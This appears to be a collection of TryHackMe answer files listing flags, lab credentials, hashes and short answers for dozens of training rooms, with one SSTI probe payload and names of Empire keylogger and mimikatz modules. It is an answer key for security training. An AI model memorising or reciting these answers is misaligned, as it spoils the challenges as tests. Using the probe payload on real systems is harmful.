1 | Theseus 2 | https://tryhackme.com/room/theseus 3 | 4 | What is the Minos flag? 5 | THM{499a89a2a064426921732e7d31bc08a} 6 | 7 | What is the Labyrinth flag? 8 | THM{6154ea526254375613650183962bf431} 9 | 10 | What is the Minotaur flag? 11 | THM{c307b8045208fac06b9faa90e68d2ad4} 12 | 13 | What is the Athens flag? 14 | THM{bb2af471e0aea04e982c2e5d0a6fa404} -------------------------------------------------------------------------------- /rooms/frank & herby make an app.txt: -------------------------------------------------------------------------------- 1 | Frank & Herby make an app 2 | https://tryhackme.com/room/frankandherby 3 | 4 | What port has a webpage frank was able to stand up? 5 | 31337 6 | 7 | What did frank leave exposed on the site? 8 | .git-credentials 9 | 10 | What is the user.txt flag? 11 | THM{F@nkth3T@nk} 12 | 13 | What is the root.txt flag? 14 | THM{M1cr0K8s_13_FUN} 15 | -------------------------------------------------------------------------------- /rooms/chocolate factory.txt: -------------------------------------------------------------------------------- 1 | Chocolate Factory 2 | https://tryhackme.com/room/chocolatefactory 3 | 4 | Enter the key you found! 5 | b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=' 6 | 7 | What is Charlie's password? 8 | cn7824 9 | 10 | Enter the user flag 11 | flag{cd5509042371b34e4826e4838b522d2e} 12 | 13 | Enter the root flag 14 | flag{cec59161d338fef787fcb4e296b42124} 15 | -------------------------------------------------------------------------------- /rooms/atlas.txt: -------------------------------------------------------------------------------- 1 | Atlas 2 | https://tryhackme.com/room/atlas 3 | 4 | With the Nmap default port range, you should find that two ports are open. What port numbers are these? 5 | 3389,8080 6 | 7 | What service does Nmap think is running on the higher of the two ports? 8 | http-proxy 9 | 10 | What is the Administrator account's NTLM password hash? 11 | c16444961f67af7eea7e420b65c8c3eb 12 | -------------------------------------------------------------------------------- /koth/hackers.txt: -------------------------------------------------------------------------------- 1 | Flags 2 | thm{068754683abe0bf81fb621ce55a91964} 3 | thm{12361ad240fec43005844016092f1e05} 4 | thm{2124a8091b664c98a0e5bdbb7a4fa1cb} 5 | thm{3ce2fe64055d3b543360c3fc880194f8} 6 | thm{678d0231fb4e2150afc1c4e336fcf44d} 7 | thm{879f3238fb0a4bf1c23fd82032d237ff} 8 | thm{b63670f7192689782a45d8044c63197f} 9 | thm{b94f8d2e715973f8bc75fe099c8492c4} 10 | thm{d8deb5f0526ec81f784ce68e641cde40} -------------------------------------------------------------------------------- /rooms/different ctf.txt: -------------------------------------------------------------------------------- 1 | Different CTF 2 | https://tryhackme.com/room/adana 3 | 4 | How many ports are open ? 5 | 2 6 | 7 | What is the name of the secret directory ? 8 | /announcements/ 9 | 10 | Web flag ? 11 | THM{343a7e2064a1d992c01ee201c346edff} 12 | 13 | User flag ? 14 | THM{8ba9d7715fe726332b7fc9bd00e67127} 15 | 16 | Root flag ? 17 | THM{c5a9d3e4147a13cbd1ca24b014466a6c} 18 | -------------------------------------------------------------------------------- /rooms/basic malware re.txt: -------------------------------------------------------------------------------- 1 | Basic Malware RE 2 | https://tryhackme.com/room/basicmalwarere 3 | 4 | What is the flag of which that MD5 gets generated? 5 | FLAG{CAN-I-MAKE-IT-ANYMORE-OBVIOUS} 6 | 7 | What is the flag of which that MD5 gets generated? 8 | FLAG{STACK-STRINGS-ARE-BEST-STRINGS} 9 | 10 | What is the flag of which that MD5 gets generated? 11 | FLAG{RESOURCES-ARE-POPULAR-FOR-MALWARE} 12 | -------------------------------------------------------------------------------- /rooms/daves blog.txt: -------------------------------------------------------------------------------- 1 | Dave's Blog 2 | https://tryhackme.com/room/davesblog 3 | 4 | Flag 1 5 | THM{SuperSecureAdminPassword123} 6 | 7 | Flag 2 / User flag 8 | THM{5fa1f779d1835367fdcfa4741bebb88a} 9 | 10 | Flag 3 11 | THM{993e107fc66844482bb5dd0e4c485d5b} 12 | 13 | Flag 4 14 | THM{runn1ng_str1ngs_1s_b4sic4lly_RE} 15 | 16 | Flag 5 / Root flag 17 | THM{a0a9c4f6809c84e212ac889d39b9cb48} 18 | -------------------------------------------------------------------------------- /rooms/sqhell.txt: -------------------------------------------------------------------------------- 1 | SQHell 2 | https://tryhackme.com/room/sqhell 3 | 4 | Flag 1 5 | THM{FLAG1:E786483E5A53075750F1FA792E823BD2} 6 | 7 | Flag 2 8 | THM{FLAG2:C678ABFE1C01FCA19E03901CEDAB1D15} 9 | 10 | Flag 3 11 | THM{FLAG3:97AEB3B28A4864416718F3A5FAF8F308} 12 | 13 | Flag 4 14 | THM{FLAG4:BDF317B14EEF80A3F90729BF2B426BEF} 15 | 16 | Flag 5 17 | THM{FLAG5:B9C690D3B914F7038BA1FC65B3FDF3C8} 18 | -------------------------------------------------------------------------------- /rooms/youre in a cave.txt: -------------------------------------------------------------------------------- 1 | You're in a cave 2 | https://tryhackme.com/room/inacave 3 | 4 | What was the weird thing carved on the door? 5 | ^ed[h#f]{3}[123]{1,2}xf[!@#*]$ 6 | 7 | What weapon you used to defeat the skeleton? 8 | bone-breaking-war-hammer 9 | 10 | What is the cave flag? 11 | THM{no_wall_can_stop_me} 12 | 13 | What is the outside flag? 14 | THM{digging_down_then_digging_up} 15 | -------------------------------------------------------------------------------- /rooms/binex.txt: -------------------------------------------------------------------------------- 1 | Binex 2 | https://tryhackme.com/room/binex 3 | 4 | What are the login credential for initial access. 5 | tryhackme:thebest 6 | 7 | What is the contents of /home/des/flag.txt? 8 | THM{exploit_the_SUID} 9 | 10 | What is the contents of /home/kel/flag.txt? 11 | THM{buffer_overflow_in_64_bit} 12 | 13 | What is the contents of /root/root.txt? 14 | THM{SUID_binary_and_PATH_exploit} 15 | -------------------------------------------------------------------------------- /rooms/daily bugle.txt: -------------------------------------------------------------------------------- 1 | Daily Bugle 2 | https://tryhackme.com/room/dailybugle 3 | 4 | Access the web server, who robbed the bank? 5 | spiderman 6 | 7 | What is the Joomla version? 8 | 3.7.0 9 | 10 | What is Jonah's cracked password? 11 | spiderman123 12 | 13 | What is the user flag? 14 | 27a260fe3cba712cfdedb1c86d80442e 15 | 16 | What is the root flag? 17 | eec3d53292b1821868266858d7fa6f79 18 | -------------------------------------------------------------------------------- /rooms/intro to graphql hacking.txt: -------------------------------------------------------------------------------- 1 | Intro to GraphQL Hacking 2 | https://tryhackme.com/room/introtographqlhacking 3 | 4 | There are two queries after the introspection, namely User, and XXXX. What is the missing query? 5 | Post 6 | 7 | Challenge! Since you're able to disclose the column names, what is the email of the user named bob? 8 | bob@graphql.thm 9 | 10 | What is the flag? 11 | GRAPHQL{sQl_1Nj3cti0n} 12 | -------------------------------------------------------------------------------- /rooms/cyborg.txt: -------------------------------------------------------------------------------- 1 | Cyborg 2 | https://tryhackme.com/room/cyborgt8 3 | 4 | Scan the machine, how many ports are open? 5 | 2 6 | 7 | What service is running on port 22? 8 | ssh 9 | 10 | What service is running on port 80? 11 | http 12 | 13 | What is the user.txt flag? 14 | flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3} 15 | 16 | What is the root.txt flag? 17 | flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d} 18 | -------------------------------------------------------------------------------- /rooms/kubernetes for everyone.txt: -------------------------------------------------------------------------------- 1 | Kubernetes for Everyone 2 | https://tryhackme.com/room/kubernetesforyouly 3 | 4 | Find the username? 5 | vagrant 6 | 7 | Find the password? 8 | hereiamatctf907 9 | 10 | What secret did you find? 11 | THM{yes_there_$s_no_$ecret} 12 | 13 | What is the volume flag? 14 | THM{this_joke_is_cold_joke} 15 | 16 | What's the secret to the FANG interview? 17 | chidori 18 | -------------------------------------------------------------------------------- /rooms/dll hijacking.txt: -------------------------------------------------------------------------------- 1 | DLL HIJACKING 2 | https://tryhackme.com/room/dllhijacking 3 | 4 | Which process may work with psinject? 5 | explorer 6 | 7 | What is the Windows build number? 8 | 1903 9 | 10 | What is the name of the DLL that is written to System32? 11 | ualapi.dll 12 | 13 | What is the other user on the machine? 14 | John 15 | 16 | What is the other user's password? 17 | 1q2w3e!Q@W#E1q2w3e 18 | -------------------------------------------------------------------------------- /rooms/gallery.txt: -------------------------------------------------------------------------------- 1 | Gallery 2 | https://tryhackme.com/room/gallery666 3 | 4 | How many ports are open? 5 | 2 6 | 7 | What's the name of the CMS? 8 | Simple Image Gallery 9 | 10 | What's the hash password of the admin user? 11 | a228b12a08b6527e7978cbe5d914531c 12 | 13 | What's the user flag? 14 | THM{af05cd30bfed67849befd546ef} 15 | 16 | What's the root flag? 17 | THM{ba87e0dfe5903adfa6b8b450ad7567bafde87} 18 | -------------------------------------------------------------------------------- /rooms/how to use tryhackme.txt: -------------------------------------------------------------------------------- 1 | How to use TryHackMe 2 | https://tryhackme.com/room/howtousetryhackme 3 | 4 | On your machine (right-hand side), lets list what files and folders there are. We can do this by typing "ls". What is the name of the folder you see? 5 | testdir 6 | 7 | We can see a files content by typing "cat ". List the files in the folder you are in, what is content of the hello.txt file? 8 | hacking labs 9 | -------------------------------------------------------------------------------- /rooms/race conditions challenge.txt: -------------------------------------------------------------------------------- 1 | Race Conditions Challenge 2 | https://tryhackme.com/room/raceconditions 3 | 4 | What is the flag for the /home/walk/flag binary? 5 | THM{R4c3_c0nd1710n5_1n_7h3_f1l35y573m} 6 | 7 | What is the flag for the /home/run/flag binary? 8 | THM{R4c1n6_f4573r_7h4n_y0ur_53cur17y_ch3ck5} 9 | 10 | What is the flag for the /home/sprint/flag binary? 11 | THM{R4c1n6_f0r_7h47_5w337_m0n3y_$$$$$} 12 | -------------------------------------------------------------------------------- /rooms/ssti.txt: -------------------------------------------------------------------------------- 1 | SSTI 2 | https://tryhackme.com/room/learnssti 3 | 4 | What sequence of characters causes the application to throw an error? 5 | {{ 6 | 7 | What template engine is being used in this application? 8 | Jinja2 9 | 10 | How do you start a comment in Jinja2? 11 | {# 12 | 13 | What is the result of the "whoami" shell command? 14 | jake 15 | 16 | What payload was used to confirm SSTI? 17 | {{ '7'*7 }} 18 | -------------------------------------------------------------------------------- /rooms/sustah.txt: -------------------------------------------------------------------------------- 1 | Sustah 2 | https://tryhackme.com/room/sustah 3 | 4 | What is the number that revealed the path? 5 | 10921 6 | 7 | Name the path. 8 | /YouGotTh3P@th/ 9 | 10 | What is the name of CMS? 11 | Mara 12 | 13 | What version of the CMS is running? 14 | 7.5 15 | 16 | What is the user flag? 17 | 6b18f161b4de63b5f72577c737b7ebc8 18 | 19 | What is the root flag? 20 | afbb1696a893f35984163021d03f6095 21 | -------------------------------------------------------------------------------- /rooms/become a hacker.txt: -------------------------------------------------------------------------------- 1 | Become a Hacker 2 | https://tryhackme.com/room/becomeahackeroa 3 | 4 | Which of the following options better represents the process where you simulate a hacker's actions to find vulnerabilities in a system? 5 | Offensive Security 6 | 7 | What is the name of the hidden web page you discovered? 8 | login 9 | 10 | What is the secret message that you have discovered? 11 | born_to_be_a_hacker 12 | 13 | -------------------------------------------------------------------------------- /rooms/offensive security intro.txt: -------------------------------------------------------------------------------- 1 | Offensive Security Intro 2 | https://tryhackme.com/room/offensivesecurityintro 3 | 4 | Which of the following options better represents the process where you simulate a hacker's actions to find vulnerabilities in a system? 5 | Offensive Security 6 | 7 | Above your account balance, you should now see a message indicating the answer to this question. Can you find the answer you need? 8 | BANK-HACKED 9 | -------------------------------------------------------------------------------- /rooms/crocc crew.txt: -------------------------------------------------------------------------------- 1 | Crocc Crew 2 | https://tryhackme.com/room/crocccrew 3 | 4 | What is the User flag? 5 | THM{Gu3st_Pl3as3} 6 | 7 | What is the name of the account Crocc Crew planted? 8 | admcrocccrew 9 | 10 | What is the Privileged User's flag? 11 | THM{0n-Y0ur-Way-t0-DA} 12 | 13 | What is the Second Privileged User's flag? 14 | THM{Wh4t-t0-d0...Wh4t-t0-d0} 15 | 16 | What is the Root flag? 17 | THM{Cr0ccCrewStr1kes!} 18 | -------------------------------------------------------------------------------- /rooms/recovery.txt: -------------------------------------------------------------------------------- 1 | Recovery 2 | https://tryhackme.com/room/recovery 3 | 4 | Flag 0 5 | THM{d8b5c89061ed767547a782e0f9b0b0fe} 6 | 7 | Flag 1 8 | THM{4c3e355694574cb182ca3057a685509d} 9 | 10 | Flag 2 11 | THM{72f8fe5fd968b5817f67acecdc701e52} 12 | 13 | Flag 3 14 | THM{70f7de17bb4e08686977a061205f3bf0} 15 | 16 | Flag 4 17 | THM{b0757f8fb8fe8dac584e80c6ac151d7d} 18 | 19 | Flag 5 20 | THM{088a36245afc7cb935f19f030c4c28b2} 21 | -------------------------------------------------------------------------------- /rooms/watcher.txt: -------------------------------------------------------------------------------- 1 | Watcher 2 | https://tryhackme.com/room/watcher 3 | 4 | Flag 1 5 | FLAG{robots_dot_text_what_is_next} 6 | 7 | Flag 2 8 | FLAG{ftp_you_and_me} 9 | 10 | Flag 3 11 | FLAG{lfi_what_a_guy} 12 | 13 | Flag 4 14 | FLAG{chad_lifestyle} 15 | 16 | Flag 5 17 | FLAG{live_by_the_cow_die_by_the_cow} 18 | 19 | Flag 6 20 | FLAG{but_i_thought_my_script_was_secure} 21 | 22 | Flag 7 23 | FLAG{who_watches_the_watchers} 24 | -------------------------------------------------------------------------------- /rooms/enumeration & brute force.txt: -------------------------------------------------------------------------------- 1 | Enumeration & Brute Force 2 | https://tryhackme.com/room/enumerationbruteforce 3 | 4 | What type of error messages can unintentionally provide attackers with confirmation of valid usernames? 5 | Verbose Errors 6 | 7 | What is the valid email address from the list? 8 | canderson@gmail.com 9 | 10 | What is the flag? 11 | THM{50_pr3d1ct4BL333!!} 12 | 13 | What is the flag? 14 | THM{b4$$1C_AuTTHHH} 15 | -------------------------------------------------------------------------------- /rooms/polkit cve-2021-3560.txt: -------------------------------------------------------------------------------- 1 | Polkit: CVE-2021-3560 2 | https://tryhackme.com/room/polkit 3 | 4 | What is the URL of the website you should submit dynamic flags to? 5 | https://flag.muir.land/ 6 | 7 | In what version of Ubuntu's policykit-1 is CVE-2021-3560 patched? 8 | 0.105-26ubuntu1.1 9 | 10 | What program can we use to run commands as other users via polkit? 11 | pkexec 12 | 13 | Root Flag 14 | THM{N2I0MTgzZTE4ZWQ0OGY0NjdiNTQ0NTZi} 15 | -------------------------------------------------------------------------------- /rooms/phishing hiddeneye.txt: -------------------------------------------------------------------------------- 1 | Phishing: HiddenEye 2 | https://tryhackme.com/room/phishinghiddeneye 3 | 4 | Which image shows a legit web-page? They are identical and most phishing pages nowadays have HTTPS enabled. (Image 1 or Image 2) 5 | Image 2 6 | 7 | What will you use this tool for? 8 | Educational Purposes 9 | 10 | What is the weakest link in cyber-security? 11 | Humans 12 | 13 | Do most phishing pages have HTTPS (Yay/Nay)? 14 | Yay 15 | -------------------------------------------------------------------------------- /rooms/empire.txt: -------------------------------------------------------------------------------- 1 | Empire 2 | https://tryhackme.com/room/rppsempire 3 | 4 | What module allows you to use any mimikatz command? 5 | powershell/credentials/mimikatz/command 6 | 7 | What MITRE ATT&CK technique is associated with powershell/trollsploit/voicetroll? 8 | T1491 9 | 10 | What module implants a keylogger on the device? 11 | powershell/collection/keylogger 12 | 13 | What MITRE ATT&CK technique is associated with the module above? 14 | T1056 15 | -------------------------------------------------------------------------------- /rooms/vulnnet internal.txt: -------------------------------------------------------------------------------- 1 | VulnNet: Internal 2 | https://tryhackme.com/room/vulnnetinternal 3 | 4 | What is the services flag? (services.txt) 5 | THM{0a09d51e488f5fa105d8d866a497440a} 6 | 7 | What is the internal flag? ("internal flag") 8 | THM{ff8e518addbbddb74531a724236a8221} 9 | 10 | What is the user flag? (user.txt) 11 | THM{da7c20696831f253e0afaca8b83c07ab} 12 | 13 | What is the root flag? (root.txt) 14 | THM{e8996faea46df09dba5676dd271c60bd} 15 | -------------------------------------------------------------------------------- /rooms/hamlet.txt: -------------------------------------------------------------------------------- 1 | Hamlet 2 | https://tryhackme.com/room/hamlet 3 | 4 | What is Michael's password? 5 | vnsanctified 6 | 7 | Flag 1 8 | THM{1_most_mechanical_and_dirty_hand} 9 | 10 | Flag 2 11 | THM{2_ophelia_s_grave} 12 | 13 | Flag 3 14 | THM{3_i_was_the_more_deceived} 15 | 16 | Flag 4 17 | THM{4_the_murder_of_gonzago} 18 | 19 | Flag 5 20 | THM{5_murder_most_foul} 21 | 22 | Flag 6 23 | THM{6_though_this_be_madness_yet_there_is_method_in_t} 24 | -------------------------------------------------------------------------------- /rooms/broker.txt: -------------------------------------------------------------------------------- 1 | broker 2 | https://tryhackme.com/room/broker 3 | 4 | Do a TCP portscan on all ports with port number greater than 1000 and smaller than 10000! Which TCP ports do you find to be open? (counting up) 5 | 1883,8161 6 | 7 | What is the name of the software they use? 8 | ActiveMQ 9 | 10 | Which videogame are Paul and Max talking about? 11 | Hacknet 12 | 13 | flag.txt 14 | THM{you_got_a_m3ss4ge} 15 | 16 | root.txt 17 | THM{br34k_br0k3_br0k3r} 18 | -------------------------------------------------------------------------------- /rooms/unstable twin.txt: -------------------------------------------------------------------------------- 1 | Unstable Twin 2 | https://tryhackme.com/room/unstabletwin 3 | 4 | What is the build number of Vincent's server? 5 | 1.3.4-dev 6 | 7 | Is this the only build? (Yay/Nay) 8 | Nay 9 | 10 | How many users are there? 11 | 5 12 | 13 | What colour is Vincent? 14 | Orange 15 | 16 | What is Mary Ann's SSH password 17 | experiment 18 | 19 | User Flag 20 | THM{Mary_Ann_notes} 21 | 22 | Final Flag 23 | THM{The_Family_Is_Back_Together} 24 | -------------------------------------------------------------------------------- /rooms/skynet.txt: -------------------------------------------------------------------------------- 1 | Skynet 2 | https://tryhackme.com/room/skynet 3 | 4 | What is Miles password for his emails? 5 | cyborg007haloterminator 6 | 7 | What is the hidden directory? 8 | /45kra24zxs28v3yd 9 | 10 | What is the vulnerability called when you can include a remote file for malicious purposes? 11 | remote file inclusion 12 | 13 | What is the user flag? 14 | 7ce5c2109a40f958099283600a9ae807 15 | 16 | What is the root flag? 17 | 3f0372db24753accc7179a282cd6a949 18 | -------------------------------------------------------------------------------- /rooms/clocky.txt: -------------------------------------------------------------------------------- 1 | Clocky 2 | https://tryhackme.com/room/clocky 3 | 4 | What is flag 1? 5 | THM{14b45bb9eefdb584b79063eca6a31b7a} 6 | 7 | What is flag 2? 8 | THM{1d3d62de34a3692518d03ec474159eaf} 9 | 10 | What is flag 3? 11 | THM{ee68e42f755f6ebbcd89439432d7b462} 12 | 13 | What is flag 4? 14 | THM{350020dc1a53e50e1e92bac2c35dd0a2} 15 | 16 | What is flag 5? 17 | THM{e57dfa35e62d518cfd215dd7729d0877} 18 | 19 | What is flag 6? 20 | THM{6ad86ac1463ea8afbe0edd6cdd708f36} 21 | -------------------------------------------------------------------------------- /rooms/sts credentials lab.txt: -------------------------------------------------------------------------------- 1 | STS Credentials Lab 2 | https://tryhackme.com/room/stscredentialslab 3 | 4 | What are the first letters of the GroupId of the padawans group? 5 | AGPA 6 | 7 | What is the character length of the SecretAccessKey? 8 | 40 9 | 10 | How many minutes are your session credentials good for? 11 | 60 12 | 13 | How many AWS CLI environment variables were required to be set? 14 | 3 15 | 16 | What IAM resource does the string that begins with AROA represent? 17 | Role 18 | -------------------------------------------------------------------------------- /rooms/rootme.txt: -------------------------------------------------------------------------------- 1 | RootMe 2 | https://tryhackme.com/room/rrootme 3 | 4 | Scan the machine, how many ports are open? 5 | 2 6 | 7 | What version of Apache is running? 8 | 2.4.29 9 | 10 | What service is running on port 22? 11 | ssh 12 | 13 | What is the hidden directory? 14 | /panel/ 15 | 16 | user.txt 17 | THM{y0u_g0t_a_sh3ll} 18 | 19 | Search for files with SUID permission, which file is weird? 20 | /usr/bin/python 21 | 22 | root.txt 23 | THM{pr1v1l3g3_3sc4l4t10n} 24 | -------------------------------------------------------------------------------- /rooms/security operations.txt: -------------------------------------------------------------------------------- 1 | Security Operations 2 | https://tryhackme.com/room/securityoperations 3 | 4 | What does SOC stand for? 5 | Security Operations Center 6 | 7 | How many hours a day does the SOC monitor the network? 8 | 24 9 | 10 | What does NSM stand for? 11 | Network security monitoring 12 | 13 | Add the necessary firewall rules to block the ongoing attack. What is the flag that you have received after successfully stopping the attack? 14 | THM{ATTACK_BLOCKED} 15 | -------------------------------------------------------------------------------- /rooms/lian_yu.txt: -------------------------------------------------------------------------------- 1 | Lian_Yu 2 | https://tryhackme.com/room/lianyu 3 | 4 | What is the Web Directory you found? 5 | 2100 6 | 7 | what is the file name you found? 8 | green_arrow.ticket 9 | 10 | what is the FTP Password? 11 | !#th3h00d 12 | 13 | what is the file name with SSH password? 14 | shado 15 | 16 | user.txt 17 | THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T} 18 | 19 | root.txt 20 | THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D} 21 | -------------------------------------------------------------------------------- /rooms/chrome.txt: -------------------------------------------------------------------------------- 1 | Chrome 2 | https://tryhackme.com/room/chrome 3 | 4 | What is the first password that we find? 5 | bubbles 6 | 7 | What is the URL found in the first index? Fully defang the URL 8 | hxxps[://]mysecuresite[.]thm/ 9 | 10 | What is the password found in the first index? 11 | Sup3rPaS$w0rd1 12 | 13 | What is the URL found in the second index? Fully defang the URL 14 | hxxps[://]worksite[.]thm/ 15 | 16 | What is the password found in the second index? 17 | Sup3rSecuR3! 18 | -------------------------------------------------------------------------------- /rooms/introduction to django.txt: -------------------------------------------------------------------------------- 1 | Introduction to Django 2 | https://tryhackme.com/room/django 3 | 4 | How would we create an app called Forms? 5 | python3 manage.py startapp Forms 6 | 7 | How would we run our project to a local network? 8 | python3 manage.py runserver 0.0.0.0:8000 9 | 10 | Flag from GitHub page 11 | THM{g1t_djang0_hUb} 12 | 13 | Admin panel flag? 14 | THM{DjanGO_Adm1n} 15 | 16 | User flag? 17 | THM{SSH_gUy_101} 18 | 19 | Hidden flag? 20 | THM{django_w1zzard} 21 | -------------------------------------------------------------------------------- /rooms/uranium ctf.txt: -------------------------------------------------------------------------------- 1 | Uranium CTF 2 | https://tryhackme.com/room/uranium 3 | 4 | What is the required password for the chat app? 5 | MBMD1vdpjg3kGv6SsIz56VNG 6 | 7 | What is the password of hakanbey user? 8 | Mys3cr3tp4sw0rD 9 | 10 | user_1.txt 11 | thm{2aa50e58fa82244213d5438187c0da7c} 12 | 13 | user_2.txt 14 | thm{804d12e6d16189075db2d45449aeda5f} 15 | 16 | web_flag.txt 17 | thm{019d332a6a223a98b955c160b3e6750a} 18 | 19 | root.txt 20 | thm{81498047439cc0426bafa1db5da699cd} 21 | -------------------------------------------------------------------------------- /rooms/cooctus stories.txt: -------------------------------------------------------------------------------- 1 | Cooctus Stories 2 | https://tryhackme.com/room/cooctusadventures 3 | 4 | Paradox is nomming cookies 5 | THM{2dccd1ab3e03990aea77359831c85ca2} 6 | 7 | Find out what Szymex is working on 8 | THM{c89f9f4ef264e22001f9a9c3d72992ef} 9 | 10 | Find out what Tux is working on 11 | THM{592d07d6c2b7b3b3e7dc36ea2edbd6f1} 12 | 13 | Find out what Varg is working on 14 | THM{3a33063a4a8a5805d17aa411a53286e6} 15 | 16 | Get full root privileges 17 | THM{H4CK3D_BY_C00CTUS_CL4N} 18 | -------------------------------------------------------------------------------- /rooms/ghizer.txt: -------------------------------------------------------------------------------- 1 | Ghizer 2 | https://tryhackme.com/room/ghizerctf 3 | 4 | What are the credentials you found in the configuration file? 5 | Anny:P4$W0RD!!#S3CUr3! 6 | 7 | What is the login path for the wordpress installation? 8 | /?devtools 9 | 10 | Compromise the machine and locate user.txt 11 | THM{EB0C770CCEE1FD73204F954493B1B6C5E7155B177812AAB47EFB67D34B37EBD3} 12 | 13 | Escalate privileges and obtain root.txt 14 | THM{02EAD328400C51E9AEA6A5DB8DE8DD499E10E975741B959F09BFCF077E11A1D9} 15 | -------------------------------------------------------------------------------- /rooms/lunizz ctf.txt: -------------------------------------------------------------------------------- 1 | Lunizz CTF 2 | https://tryhackme.com/room/lunizzctfnd 3 | 4 | What is the default password for mysql 5 | CTF_script_cave_changeme 6 | 7 | I can't run commands, there must be a mysql column that controls command executer 8 | run 9 | 10 | a folder shouldn't be... 11 | proct 12 | 13 | hi adam, do you remember our place? 14 | northern lights 15 | 16 | user.txt 17 | thm{23cd53cbb37a37a74d4425b703d91883} 18 | 19 | root.txt 20 | thm{ad23b9c63602960371b50c7a697265db} 21 | -------------------------------------------------------------------------------- /rooms/ohsint.txt: -------------------------------------------------------------------------------- 1 | OhSINT 2 | https://tryhackme.com/room/ohsint 3 | 4 | What is this user's avatar of? 5 | cat 6 | 7 | What city is this person in? 8 | London 9 | 10 | What is the SSID of the WAP he connected to? 11 | UnileverWiFi 12 | 13 | What is his personal email address? 14 | OWoodflint@gmail.com 15 | 16 | What site did you find his email address on? 17 | Github 18 | 19 | Where has he gone on holiday? 20 | New York 21 | 22 | What is the person's password? 23 | pennYDr0pper.! 24 | -------------------------------------------------------------------------------- /rooms/bebop.txt: -------------------------------------------------------------------------------- 1 | Bebop 2 | https://tryhackme.com/room/bebop 3 | 4 | What is your codename? 5 | pilot 6 | 7 | What is the User Flag? 8 | THM{r3m0v3_b3f0r3_fl16h7} 9 | 10 | What is the Root Flag? 11 | THM{h16hw4y_70_7h3_d4n63r_z0n3} 12 | 13 | What is the low privilleged user? 14 | pilot 15 | 16 | What binary was used to escalate privileges? 17 | busybox 18 | 19 | What service was used to gain an initial shell? 20 | telnet 21 | 22 | What Operating System does the drone run? 23 | FreeBSD 24 | -------------------------------------------------------------------------------- /rooms/brains.txt: -------------------------------------------------------------------------------- 1 | Brains 2 | https://tryhackme.com/room/brains 3 | 4 | What is the content of flag.txt in the user's home folder? 5 | THM{faa9bac345709b6620a6200b484c7594} 6 | 7 | What is the name of the backdoor user which was created on the server after exploitation? 8 | eviluser 9 | 10 | What is the name of the malicious-looking package installed on the server? 11 | datacollector 12 | 13 | What is the name of the plugin installed on the server after successful exploitation? 14 | AyzzbuXY.zip 15 | -------------------------------------------------------------------------------- /rooms/super-spam.txt: -------------------------------------------------------------------------------- 1 | Super-Spam 2 | https://tryhackme.com/room/superspamr 3 | 4 | What CMS and version is being used? (format: wordpress x.x.x) 5 | concrete5 8.5.2 6 | 7 | What is the user flag? 8 | flag{-eteKc=skineogyls45«ey?t+du8} 9 | 10 | What type of encryption did super-spam use to send his encrypted messages? 11 | XOR 12 | 13 | What key information was embedded in one of super-spam's encrypted messages? 14 | $$L3qwert30kcool 15 | 16 | What is the root flag? 17 | flag{iteeKdbu==hjK6§YuUu7-6N_} 18 | -------------------------------------------------------------------------------- /rooms/traffic analysis essentials.txt: -------------------------------------------------------------------------------- 1 | Traffic Analysis Essentials 2 | https://tryhackme.com/room/trafficanalysisessentials 3 | 4 | Which Security Control Level covers contain creating security policies? 5 | Administrative 6 | 7 | Which Access Control element works with data metrics to manage data flow? 8 | Load Balancing 9 | 10 | Which technology helps correlate different tool outputs and data sources? 11 | SOAR 12 | 13 | What is the flag? 14 | THM{PACKET_MASTER} 15 | 16 | What is the flag? 17 | THM{DETECTION_MASTER} 18 | -------------------------------------------------------------------------------- /rooms/training impact on teams.txt: -------------------------------------------------------------------------------- 1 | Training Impact on Teams 2 | https://tryhackme.com/room/training 3 | 4 | What is the most efficient way to ramp up the skills of a junior hire in cyber security? 5 | Training 6 | 7 | What is the name of the dashboard that TryHackMe offers for companies to create customised training paths? 8 | Content Studio 9 | 10 | What would be the savings due to the increased productivity? 11 | 40000 12 | 13 | Assuming that training costs $500 per employee, what is the Return on Investment? 14 | 400% 15 | -------------------------------------------------------------------------------- /rooms/trypwnme two.txt: -------------------------------------------------------------------------------- 1 | TryPwnMe Two 2 | https://tryhackme.com/room/trypwnmetwo 3 | 4 | What is the content of the file flag.txt on the target? 5 | THM{TryExecMe-reveng3-with-no-s1sc4lls-nic3} 6 | 7 | What is the content of the file flag.txt on the target? 8 | THM{f0rm4t-str1ng-n0t-sp3cified-ag4in} 9 | 10 | What is the content of the file flag.txt on the target? 11 | THM{l3arning-h3ap-1nt3rn4ls-with-the-b3ar} 12 | 13 | What is the content of the file flag.txt on the target? 14 | THM{ab4d-w3b-s3rv3r-g00d-rop-my-fr1end} 15 | -------------------------------------------------------------------------------- /rooms/windows reversing intro.txt: -------------------------------------------------------------------------------- 1 | Windows Reversing Intro 2 | https://tryhackme.com/room/windowsreversingintro 3 | 4 | In the HelloWorld.exe sample, which instruction sets up the first parameter for the call to printf()? Provide the full instruction as shown in IDA, with single spaces. Example: mov RAX, RBX 5 | lea rcx, Format 6 | 7 | In the Loop.exe sample, what instruction is the key to finding out what register is the counter? Provide the full instruction as shown in IDA, with single spaces. For example: dec RAX 8 | inc rcx 9 | 10 | -------------------------------------------------------------------------------- /rooms/junior security analyst intro.txt: -------------------------------------------------------------------------------- 1 | Junior Security Analyst Intro 2 | https://tryhackme.com/room/jrsecanalystintrouxo 3 | 4 | What will be your role as a Junior Security Analyst? 5 | Triage Specialist 6 | 7 | What was the malicious IP address in the alerts? 8 | 221.181.185.159 9 | 10 | To whom did you escalate the event associated with the malicious IP address? 11 | Will Griffin 12 | 13 | After blocking the malicious IP address on the firewall, what message did the malicious actor leave for you? 14 | THM{UNTIL-WE-MEET-AGAIN} 15 | -------------------------------------------------------------------------------- /rooms/anonymous.txt: -------------------------------------------------------------------------------- 1 | Anonymous 2 | https://tryhackme.com/room/anonymous 3 | 4 | Enumerate the machine. How many ports are open? 5 | 6 | 4 7 | Correct Answer 8 | What service is running on port 21? 9 | 10 | ftp 11 | Correct Answer 12 | What service is running on ports 139 and 445? 13 | 14 | smb 15 | Correct Answer 16 | There's a share on the user's computer. What's it called? 17 | 18 | pics 19 | Correct Answer 20 | user.txt 21 | 22 | 90d6f992585815ff991e68748c414740 23 | 24 | root.txt 25 | 4d930091c31a622a7ed10f27999af363 26 | -------------------------------------------------------------------------------- 